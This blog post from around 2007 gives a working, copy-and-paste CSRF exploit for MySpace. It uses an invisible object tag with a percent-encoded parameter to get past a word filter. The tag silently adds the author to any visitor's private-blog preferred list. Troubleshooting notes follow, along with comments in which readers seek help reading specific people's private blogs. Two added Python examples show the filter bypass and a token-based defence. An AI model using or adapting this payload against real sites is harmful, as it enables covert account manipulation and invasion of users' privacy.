Are you as nosy as me? Do any of your MySpace friends have blogs that only their ‘preferred’ friends can read? Does this hurt your feelings and make you want to send them a frowny face?! Well, here’s a little bit of code that can help, and the steps it took to create it. It will add you to anyone’s preferred list that looks at your profile, provided one little requirement is met.
Now we all know that when you put an IMG tag in a site, the browser tries to access the picture file specified. When the ‘picture file’ specified isn’t so much a picture, but more a query string that contains data that instructs certain sites to perform an action…the results can be “very nice” -Borat. For example, when you access the URL:
http://blog.myspace.com/index.cfm?fuseaction=blog.addToPrivateList&friendID=182315
You’d be telling MySpace to add friend ID 182315 (random) to your preferred list. If you set the “img src=” to that URL then your browser would try accessing it blindly. Though the browser doesn’t render the page, and thus does not let it set cookies or even load per se, the server still sees the access just like any other request and completes the action on behalf of the user. This type of exploit (CSRF) could be used as described above were it not for the following protection mechanisms built into MySpace:
- Filters all IMG tags in which the extension of the SRC is not a valid image extension (.jpg, .gif, .png, etc).
- Filters the word ‘fuseaction’ anywhere within your profile and links.
When MySpace filters such things, it will replace the offending part with two dots (..). With all other MySpace actions, such as adding friends, profile edits, and such, there is a temporary key generated that must be submitted with all other parameters, effectively protecting against this type of exploit. As for the subject of this article, the preferred reader list, there is no such temporary key. How do we defeat the two filters in place to foil our awesome plot?
We know it filters IMG tags, and does not allow an IFRAME at all. What other tag accesses an external file? My answer: embed. So I embed the URL above using
<embed src="http://blog.myspace.com/index.cfm?fuseaction=blog.addToPrivateList&friendID=182315"></embed>
I submit the changes and lo and behold it replaces it, but with an object tag instead…in order to block non-authorized content using specific parameters. The URL is intact but for one little part:
http://blog.myspace.com/index.cfm?..=blog.addToPrivateList&friendID=182315
fuseaction is gone. Okay so how would we fix that? So, we know that characters can be replaced with character codes, such as when you see a space in a URL replaced with %20 (32 decimal, 20 hex, space). I figure it only filters the whole string “fuseaction” and quickly look up the hexadecimal value of f (lowercase, probably doesn’t matter) and find it to be 66. So I pop in my new and improved string, with f replaced with %66 and get
<embed src=http://blog.myspace.com/index.cfm?%66useaction=blog.addToPrivateList&friendID=182315 />
MySpace of course replaces this with an object tag, but everything works. So I change the height to 0 so as to leave it unnoticed and paste it anywhere in my profile:
<object allowscriptaccess="never" allownetworking="all" height="0" data="http://blog.myspace.com/index.cfm?%66useaction=blog.addToPrivateList&friendID=YOURFRIENDID" width="425"> <param name="allowScriptAccess" value="never" /> <param name="allowNetworking" value="all" /> <param name="movie" value="http://blog.myspace.com/index.cfm?%66useaction=blog.addToPrivateList&friendID=YOURFRIENDID" /> </object>
You might have to remove some extra spaces because I had to insert them to format the page correctly. Copy and paste into your profile, replace YOURFRIENDID with your actual friend ID. This is not 100%, read why below.
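Why the %66 substitution gets past the word filter, as an added example (not MySpace's code and not part of the original post): the filter matches the raw text, while the receiving server percent-decodes the parameter name before using it. The function names are hypothetical and the two URLs are the ones quoted above.

```python
import re
from typing import Optional, Set
from urllib.parse import parse_qsl, urlsplit

BLOCKED_PARAM = "fuseaction"  # the word the article says the filter strips

# The two URLs quoted in the article
PLAIN = "http://blog.myspace.com/index.cfm?fuseaction=blog.addToPrivateList&friendID=182315"
ENCODED = "http://blog.myspace.com/index.cfm?%66useaction=blog.addToPrivateList&friendID=182315"


def naive_filter(url: str) -> str:
    """Match the literal word in the raw text and replace it with '..'."""
    return re.sub(BLOCKED_PARAM, "..", url, flags=re.IGNORECASE)


def decoded_param_names(url: str) -> Set[str]:
    """Parameter names as the receiving server sees them: percent-decoded.

    Lowercased on the assumption that the server treats names case-insensitively.
    """
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return {name.lower() for name, _ in pairs}


def hardened_filter(url: str) -> Optional[str]:
    """Decide on the decoded form and reject the whole URL rather than rewrite it."""
    if BLOCKED_PARAM in decoded_param_names(url):
        return None
    return url


if __name__ == "__main__":
    for label, url in (("plain", PLAIN), ("encoded", ENCODED)):
        print(label, "naive    ->", naive_filter(url))
        print(label, "hardened ->", hardened_filter(url))
```

A filter of this kind only narrows what can be embedded; the request still succeeds whenever the action itself needs no per-request secret.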
Though the preferred reader list is less protected than anything else, there is still a little protection. When you do a search on MySpace for a person, it sets a cookie, and this cookie needs to be set in order to add anyone to your preferred list. The cookie, I believe, is only unset when you add someone to your preferred list or when you close your browser/end session. The chance of the cookie still being set when someone visits your profile is decently high, more likely with people who leave their browser open all the time. I didn’t completely investigate the chances, because I have seen it to work, and knowing the probability won’t make it any more or less effective.
As far as MySpace fixing this, I hope they do, I have no reason to keep it private, as I don’t care at all.
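The “temporary key” that protects the other MySpace actions is what is usually called an anti-CSRF token; the added sketch below (not MySpace's code) shows the check the preferred-list action lacked. The handler, key, lifetime and session names are assumptions; unlike the search cookie, which the browser attaches to a forged request as well, the token must arrive as a request parameter that markup on someone else's profile cannot know.

```python
import hashlib
import hmac
import secrets
import time

SERVER_KEY = secrets.token_bytes(32)  # constructed for the example
TOKEN_TTL = 900                       # seconds; assumed lifetime of the temporary key
ACTION = "blog.addToPrivateList"      # action name from the article's URL


def _mac(session_id, action, issued):
    msg = f"{session_id}|{action}|{issued}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_token(session_id, action, now=None):
    """Temporary key bound to one session and one action, placed in the site's own form."""
    issued = int(time.time() if now is None else now)
    return f"{issued}:{_mac(session_id, action, issued)}"


def token_ok(session_id, action, token, now=None):
    """True only for an unexpired token issued to this session for this action."""
    now = int(time.time() if now is None else now)
    issued, _, mac = token.partition(":")
    if not (issued.isascii() and issued.isdigit()):
        return False
    if not 0 <= now - int(issued) <= TOKEN_TTL:
        return False
    expected = _mac(session_id, action, int(issued))
    return hmac.compare_digest(mac.encode(), expected.encode())


def add_to_private_list(session_id, method, params, now=None):
    """Hypothetical handler; session_id comes from the visitor's own session cookie."""
    if method != "POST":
        return "rejected: state change over GET"
    if not token_ok(session_id, ACTION, params.get("token", ""), now):
        return "rejected: missing, expired or foreign token"
    return "added " + params["friendID"]
```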
Enjoy it while you can!!!!!
Note to people who aren’t getting this to work:
- When you are added to a person’s Preferred Reader List, you will have no verification.
- No, it does not send invites to people to read your blog.
- Ensure you replace BOTH instances of YOURFRIENDID, you cannot simply copy and paste the code, again there are 2 (two) places it needs to be replaced with your friend ID, which is all numbers.
- This WILL work, provided the condition above is met (there being a recent search on MySpace), so when you’re testing, ensure you’ve done a MySpace friend search (not the main search bar, but when you actually click search in the navigation bar).
- If this doesn’t get you going in the right direction, I will help you out personally.
Update (September 08, 2007)
I have reconfirmed this several times over the last week and it is still working.

Firefox extension: Edit Cookies
addon/4510
It works. You were right, they need the cookie to be set. So they need to have performed a search for someone and not closed their browser.
would you email me privately? i am having trouble with this
i think it sent an invite to them to read my blog …not what i was looking to do
O_o What?
I tried this with my own account as well as a friend’s account. Nothing happened. At all. Chances are I’m doing something wrong since someone says it apparently works. As painstakingly annoying as it is, could you perhaps email me or instant message me *hell not just you but anyone* in regards to this? I’m certainly having a bit of trouble with this one =/
Thank you, KittiesGoWoof at Tmail.com
Hey, i copied and pasted the code, put in my friend i.d twice where it was needed, saved the changes and then searched for the friend (she’s in my friend list but yes has a preferred list)
I clicked on her profile but nope, can’t access her blog
Am i doing something wrong?
If so, would you e-mail me and let me know
Much Appreciated, Thanks
Kate
This is passive, you will not need to search for your friend. You will be added to the preferred reader list when your friend views your profile…BUT it’s not 100%, they will have needed to do a MySpace search sometime in the recent past, any search for anyone. You are completely out of control of whether that happens, so it is mostly a waiting game. Also you’ll never get a notification that you’ve been added, nor that the person visited your profile… It can be useful to lure the person into your profile by leaving comments and hoping to get comments back and also bulletins saying “OMG!!!111 Check out my profile LOLOLOL!!!!11” and such. As I said it’s not 100% but I’ve had pretty good luck with it.
Ah right thanks!
so basically they search for somebody, then view my profile
and then i’ll be able to view their blogs
do they search in the “Myspace Search” or “Find a Friend” search?
Yep you’ve got it now. I believe only “Find a Friend” will work for that.
wow this is very cool. thanks
I messaged the girl, basically she is claiming to be this guy in a band -his sister-in-law
she didn’t message me back she’s viewed my profile but she’s obviously not done a search because i can’t get in her blog.
If i gave you her myspace
is there any way you could access the preferred blogs?
there’s probably no loop-hole but i just thought i’d ask
Thanks, Kate.
Also one of her preferred list blogs ISN’T private
i don’t know if that would help you in anyway
but yeah thought i’d mention
Hi Kate, I’m very sorry it’s not working out so well for you. My colleague Jason wanted me to check if she is your friend on MySpace or not, as it may require friend status to work. As immoral as it has been already to teach such techniques, I can’t go any further. Any shadiness you do is on you
Yeah she’s on my friends list
Well thanks anyway!
i’ll paste the link anyways, because maybe her blog is different
http://www.myspace.com/shesprincessofmyspace
Thanks, Kate
I had a quick question… do I put in my ID number or whomever’s private blog I wish to see’s ID number?
Jordan,
Could you please email me when you get a chance. I have a very important question that I do not want to ask in a public forum.
mkt_mkr at hotmail.com
Thank you for your time.
ok I tried it a few different ways, and it’s still a no go for me. I see you said you would help us out personally if we can’t get it to work. would you be able to assist me? my email is meelee514 at yahoo.com. thanks!
Hey thanks for the information but I cant get it to work for me
could you help me?
question is when they view their preferred list, will your profile show up alongside everyone else’s that was intended to be preferred?
Yes it’s just like being added manually…they could notice easily…
hey could u help me do this. i want to be added to a preferred list and it didn’t work
Ok, I’ve done the search and added the code. I had my friend check my profile…but it didn’t work. Help please.
Well, if it even still does work. Your friend would have to do a search, THEN view your profile. You should then be in her preferred reader’s list. I guess I will try to verify that it still works sometime, I wouldn’t be surprised if MySpace fixed it though.
Will the user be able to see that you are all of a sudden on their preferred list? causing them to figure “oh why that’s odd, I never put them on there how did this happen?”
Please reply on forum. Great hack though.
What a HORRIBLE invasion of privacy. here i was googling a problem with adding a REAL friend to my list.. and i came across this page. although the snoop in me makes me want to try it out of course on people i think are talking about me, i still think its HORRIBLE. just b/c the temptation is there, doesn’t mean i’ll give in to it. i mean, if you go digging for things.. you just might find them..and more!
i write things to vent and relieve stress, things that i ordinarily wouldn’t want to say to someone b/c i don’t really mean it, im just mad.. or maybe i want to share something VERY personal with only a few friends.
i think its really uncool that people would use this.
yes. im human. yes, im nosey. but this is not a line i would cross.
Well guess what, they ARE writing about you! All kinds of terrible things, things no person should EVER have to read about themselves!
Thank goodness you have a moral compass that points truer than the rest of us here at smert…
But let me get real for a moment. The reason things like this get pointed out is to put it enough into the public eye so that it gets fixed. Otherwise, select few people use it to their advantage whilst the rest of us are left out in the cold, and the service provider is none-the-wiser about the vulnerability. If you really want this to stop, petition MySpace to fix it… (It’s really not too hard to fix from their end).
Now, as you are too moral for me…
Good day sir.
I SAID GOOD DAY!
The only horrible invasion of privacy is the fact that MySpace hasn’t fixed this issue in the 5 months it has been publicly available. I would like to point out that there IS NO privacy. Privacy is an illusion and if you submit something to a PUBLIC website you best assume that someone besides you can read it.
Which extra spaces in the code are we supposed to delete? Jordan, Could you contact me to help me out?
oops… e-mail – nantille2891 at hotmail.com – I still can’t get it to work
Edited by Jason
Do you realize that you can put the correct email when you post a comment and it won’t expose it to all the spammers harvesting addresses?
MySpace Private Pictures Leak
“We all heard about the MySpace vulnerability that allowed everyone to access pictures that have been set to private at MySpace. That vulnerability got closed down pretty fast. Unfortunately though (for MySpace) someone did use an automated script to run over 44,000 profiles that downloaded all private pictures which resulted in a 17 Gigabyte zip file with more than 560,000 pictures. The zip file is now showing up on popular torrent sites across the net.”
http://it.slashdot.org/article.pl?sid=08/01/25/1845206&from=rss
I can’t get this to work and I replaced the two spots with my friend ID. Can somebody please email me with a solution? thanks.
i still don’t understand what you’re supposed to do to get on the list. i mean, you add the code to your profile, like in edit profile, then just go to the persons profile and try to read the blog?
thank you, bro
Stop looking at blogs you have been nicely requested not to look at. If you are not on someone’s preferred list, get over it. Hacking your way to read things that are not meant for your eyes is WRONG.
hi im david and i dont really understand how to do this.
im wondering if you could help me out
i cant seem to work this thing out?
can you do it for me?
mail me at mata.vivian@yahoo.com
thanx :]
Is this still working? I can’t seem to get the code right. Typically, I wouldn’t read someone’s preferred list blog, but I’ve got a gut feeling that it’s imperative I read a friend’s recent entry.
Please, please help.
MySpace updated their search a few months ago and it no longer has an option to add the person to the preferred list and I’m pretty sure that this won’t be working any more.
The comments have been closed.